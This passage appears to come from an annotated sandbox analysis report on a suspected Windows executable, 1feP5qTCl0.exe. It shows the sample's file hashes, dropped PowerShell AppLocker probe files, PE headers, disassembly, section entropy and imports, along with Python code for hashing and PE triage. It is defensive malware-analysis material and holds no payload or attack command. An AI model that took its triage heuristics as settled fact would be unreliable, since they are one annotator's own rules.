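    (subsystem,) = struct.unpack_from("<H", data, opt + 68)  # same offset in PE32 and PE32+
    bits = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)
    if bits is None:
        return None
    return "%s executable (%s) %s, for MS Windows" % (
        bits, SUBSYSTEMS.get(subsystem, str(subsystem)), MACHINES.get(machine, hex(machine)))


def build_stub_pe(machine: int = 0x014C, magic: int = 0x10B, subsystem: int = 2) -> bytes:
    """Constructed minimal PE header (DOS header, PE signature, COFF header and a
    zeroed optional header): enough for pe_file_type(), not a loadable image."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0 if magic == 0x10B else 0xF0
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for name, blob in (("__PSScriptPolicyTest", APPLOCKER_TEST), ("stub PE", build_stub_pe())):
        fp = fingerprint(blob)
        print(name, fp["size"], fp["md5"], "%.6f" % fp["entropy"], pe_file_type(blob))
```

Run fingerprint() and pe_file_type() over the 38912-byte dropped PE listed earlier to confirm the MD5/SHA values, the 5.97 entropy and the "PE32 executable (GUI) Intel 80386" description shown in that entry; a hash that does not match the report, or a PE whose entropy sits near 8 bits/byte, is what deserves a closer look.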
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
[13 further entries follow in the report with exactly the same Process, File Type, Size, Entropy, SSDEEP, MD5, SHA1, SHA-256, SHA-512, Malicious:false and Preview as the entry above: 12 with Category:dropped and one with Category:modified. This 60-byte file is the probe that every powershell.exe session writes to the user's temp directory to test whether AppLocker or WDAC script enforcement is active; the copies differ only in their (omitted) random file names, so the number of entries tracks how many PowerShell sessions the sample spawned, and none of them is attacker-supplied content.]
                          Process:C:\Users\user\Desktop\1feP5qTCl0.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):19
                          Entropy (8bit):3.366091329119193
                          Encrypted:false
                          SSDEEP:3:hMCE/N:hul
                          MD5:F92A9EF0567DB794EFBE6CC7D98974CC
                          SHA1:51728A8A25C4F2805984F294DADCE85E738B90D9
                          SHA-256:26D96E97CEE88C873CFA14F364E79DAE57265CF8DA97ED1EA65A66A5EC6AD673
                          SHA-512:14C3C14D4E4D93619C0982BB22BD73930531F510C281BE2E8B1EC6C92F1E1CDCE11AC90F13D8F1F6EE79AAA88711B54AD119A16EE51582A2C6ED4071A5C9684A
                          Malicious:false
                          Preview:This is a new file.
                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                          Entropy (8bit):6.958055025032026
                          TrID:
                          • Win64 Executable GUI (202006/5) 92.65%
                          • Win64 Executable (generic) (12005/4) 5.51%
                          • Generic Win/DOS Executable (2004/3) 0.92%
                          • DOS Executable Generic (2002/1) 0.92%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:1feP5qTCl0.exe
                          File size:8'077'824 bytes
                          MD5:a499c507987982c951093e21df0c0d96
                          SHA1:fa1a7050198570e016fc4bf3ddd69160e05a8a38
                          SHA256:64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265
                          SHA512:0ab3d225fc8901d9cc1719ee61e0cdb444532f8a43b307382e7f3e5d610bcf1d54b5abef23649c370e5e960366270d99d94629e47868ae7959522a54d574a27d
                          SSDEEP:98304:ha48jDV5s44tAbCEAVomRGM6oCRXpqALGFFV/lz8RY5ui2R:haV5s4ZPAunVRZXGxlz8cuF
                          TLSH:AD868D47FC9545A9C1EEA330C9729252BA71BC495B3123D72B50F3382FB6BD1AA79700
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........u......."......~&...................@...........................................`... ............................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x46dca0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:c2d457ad8ac36fc9f18d45bffcd450c2
Instruction (entry point; x86-64 decode. The report's listing decoded this 64-bit code as 32-bit, so every REX prefix appeared as a spurious inc/dec and r8-r15 / xmm8-xmm15 as their low-register aliases; the bytes are the same.)
jmp 00007F3A8CD554C0h
int3 (x27, padding up to the next function)
push rbp
mov rbp, rsp
pushfq
cld
sub rsp, 000000E0h
mov qword ptr [rsp], rdi
mov qword ptr [rsp+08h], rsi
mov qword ptr [rsp+10h], rbp
mov qword ptr [rsp+18h], rbx
mov qword ptr [rsp+20h], r12
mov qword ptr [rsp+28h], r13
mov qword ptr [rsp+30h], r14
mov qword ptr [rsp+38h], r15
movups xmmword ptr [rsp+40h], xmm6
movups xmmword ptr [rsp+50h], xmm7
movups xmmword ptr [rsp+60h], xmm8
movups xmmword ptr [rsp+70h], xmm9
movups xmmword ptr [rsp+00000080h], xmm10
movups xmmword ptr [rsp+00000090h], xmm11
movups xmmword ptr [rsp+000000A0h], xmm12
movups xmmword ptr [rsp+000000B0h], xmm13
movups xmmword ptr [rsp+000000C0h], xmm14
movups xmmword ptr [rsp+000000D0h], xmm15
xorps xmm15, xmm15
xor r14, r14
mov rax, qword ptr [rip+00537492h]
mov rax, qword ptr [rax]
cmp rax, 00000000h
je 00007F3A8CD58DA5h
mov r14, qword ptr [rax]
sub rsp, 10h
mov rax, rcx
mov rbx, rdx
call 00007F3A8CD5979Bh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7e2000 | 0x554 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x5ac000 | 0xe058 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e3000 | 0xb014 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x4e01c0 | 0x180 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x267c35 | 0x267e00 | 558cfebf470ac7a812584396a05e84f9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x269000 | 0x2768e8 | 0x276a00 | 2ae35a91a15fad23296fb42fc5427a4a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4e0000 | 0xcb7c0 | 0x3d400 | 37f6d23a8f05c65492830f2f2d706208 | False | 0.37782605229591837 | data | 4.799848116580347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x5ac000 | 0xe058 | 0xe200 | 5cebb7c73df2da6f6181d74968b9e7fe | False | 0.40153138827433627 | data | 5.465582290244562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata | 0x5bb000 | 0xb4 | 0x200 | dbbf65544a89803849c8b94bb72da141 | False | 0.2265625 | shared library | 1.787112262798912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4 | 0x5bc000 | 0x129 | 0x200 | 17f62672c8506464ae13eccc2eb6cb94 | False | 0.623046875 | data | 5.081946473254993 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_* (see note), IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19 | 0x5bd000 | 0x6ca5f | 0x6cc00 | 1fccec32ee0f95cdbe651a6208db1bb1 | False | 0.9991581357758621 | data | 7.996511841637044 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_* (see note), IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32 | 0x62a000 | 0x16c1a | 0x16e00 | c17bbd59138a10ec4186e17c87425621 | False | 0.9933081454918032 | data | 7.937326684040818 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_* (see note), IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46 | 0x641000 | 0x30 | 0x200 | 40cca7c46fc713b4f088e5d440ca7931 | False | 0.103515625 | data | 0.8556848540171443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_* (see note), IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65 | 0x642000 | 0xea7cc | 0xea800 | a4000ac04b05d989659ba037b4fa34be | False | 0.9992535231210021 | data | 7.997931431657807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_* (see note), IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/78 | 0x72d000 | 0x8a93a | 0x8aa00 | 9ccb7bb4cfa87302129d071093acc5b2 | False | 0.9908877648782687 | data | 7.9948832902156095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_* (see note), IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/90 | 0x7b8000 | 0x29a99 | 0x29c00 | 614b9fab6634f0ffa526654d2f4e5716 | False | 0.9623058570359282 | data | 7.822178478313296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_* (see note), IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata | 0x7e2000 | 0x554 | 0x600 | 48061013b3c118f7e82018a0486c6049 | False | 0.3828125 | data | 4.060039263158338 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x7e3000 | 0xb014 | 0xb200 | ebf5eede3a8c398bf8d59cde80bcadd8 | False | 0.26264044943820225 | data | 5.430341682252091 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x7ef000 | 0x5b6ff | 0x5b800 | 7657e321956daf9b5ef7532d4d28cbdc | False | 0.22409441171448088 | data | 5.288123149705255 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Note on the /4 to /90 rows: for each of them the report prints the Characteristics as IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ. The alignment field is a 4-bit value, not a set of flags: every ALIGN_* constant listed shares the 0x00100000 bit and none of the even-valued ones appears, so the field holds IMAGE_SCN_ALIGN_1BYTES and the rest is the report matching constants bit by bit. A name of the form /N is an offset into the COFF string table, used for section names longer than the 8-byte name field. These sections are discardable and read-only, never executable or writable, so the 7.8 to 8.0 entropy of /19, /32, /65, /78 and /90 is what compressed data such as debug information looks like and is not, by itself, evidence of a packer; the writable .data (4.80) and the code in .text (no value computed) are where a packed or encrypted payload would show up.
DLL | Imports
kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler
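The static fields above (entry point and its section, image base, DLL characteristics, data directory to section mapping, per-section entropy) can all be derived from the PE headers with the standard library alone, and a parser that does so also resolves the /N section names through the COFF string table, which the report leaves unresolved. The following is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses a PE32+ constructed inline (not 1feP5qTCl0.exe), reproduces the columns of the tables above, and applies three triage rules that are this example's own choices (zero TimeDateStamp, writable+executable sections, and entropy above 7.5 judged by whether the section is IMAGE_SCN_MEM_DISCARDABLE). The sample deliberately mirrors the layout seen here, a discardable long-named section full of high-entropy bytes, because that combination (together with the zero timestamp, the .symtab section and the kernel32-only import set) is consistent with a Go-linked binary carrying compressed DWARF rather than with a packed payload; the constant values are the documented PE ones, the section name ".zdebug_info" in the sample is an assumption.

```python
import hashlib
import math
import struct
from collections import Counter
from typing import Optional

IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x02000000, 0x20000000, 0x80000000
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
                   "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
                   "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0..8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(buf: bytes) -> dict:
    """Parse DOS/COFF/optional headers, data directories and the section table of a PE image."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe_off = struct.unpack_from("<I", buf, 0x3C)[0]                      # e_lfanew
    if buf[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    (machine, nsec, timestamp, symtab_ptr, nsyms,
     opt_size, file_chars) = struct.unpack_from("<HHIIIHH", buf, pe_off + 4)
    opt = pe_off + 24                                                    # optional header
    is_64 = struct.unpack_from("<H", buf, opt)[0] == 0x20B               # 0x10B would be PE32
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    image_base = (struct.unpack_from("<Q", buf, opt + 24)[0] if is_64
                  else struct.unpack_from("<I", buf, opt + 28)[0])
    subsystem, dll_chars = struct.unpack_from("<HH", buf, opt + 68)
    ndirs_off = opt + (108 if is_64 else 92)
    ndirs = struct.unpack_from("<I", buf, ndirs_off)[0]
    dirs = {(DIRECTORY_NAMES[i] if i < 16 else str(i)):
            struct.unpack_from("<II", buf, ndirs_off + 4 + 8 * i)         # (RVA, size)
            for i in range(ndirs)}
    # The COFF string table follows the 18-byte symbol records.  A section name "/N" is a
    # decimal byte offset into it; bytes 0..3 hold the table size, so the first is always "/4".
    strtab = symtab_ptr + 18 * nsyms if symtab_ptr else None
    sections = []
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", buf, hdr)
        chars = struct.unpack_from("<I", buf, hdr + 36)[0]
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        if name[:1] == "/" and name[1:].isdigit() and strtab is not None:
            start = strtab + int(name[1:])
            name = buf[start:buf.index(b"\0", start)].decode("ascii", "replace")
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_size": raw_size, "chars": chars,
                         "entropy": shannon_entropy(buf[raw_ptr:raw_ptr + raw_size])})
    return {"is_64": is_64, "machine": machine, "timestamp": timestamp, "entry": entry,
            "image_base": image_base, "subsystem": subsystem, "dll_chars": dll_chars,
            "file_chars": file_chars, "dirs": dirs, "sections": sections}


def section_for_rva(pe: dict, rva: int) -> Optional[str]:
    """Section containing an RVA: the report's 'Entrypoint Section' / 'Is in Section' columns."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def triage(pe: dict) -> list:
    """Static findings to check before reading a high entropy value as 'packed' (example's own rules)."""
    notes = []
    if pe["timestamp"] == 0:
        notes.append("TimeDateStamp is 0: reproducible (e.g. Go-linked) or deliberately scrubbed build")
    for s in pe["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            notes.append(f"{s['name']}: writable and executable")
        if s["entropy"] > 7.5:
            if s["chars"] & IMAGE_SCN_MEM_DISCARDABLE:
                notes.append(f"{s['name']}: high entropy but DISCARDABLE (compressed debug data, not a packed payload)")
            else:
                notes.append(f"{s['name']}: high entropy in a loadable section (possible packed or encrypted payload)")
    return notes


def build_sample_pe() -> bytes:
    """Constructed PE32+ for the demo (not the analysed binary): .text, a '/4' long-name section
    filled with pseudo-random bytes the way compressed DWARF looks, and an .idata section."""
    file_align, sect_align = 0x200, 0x1000
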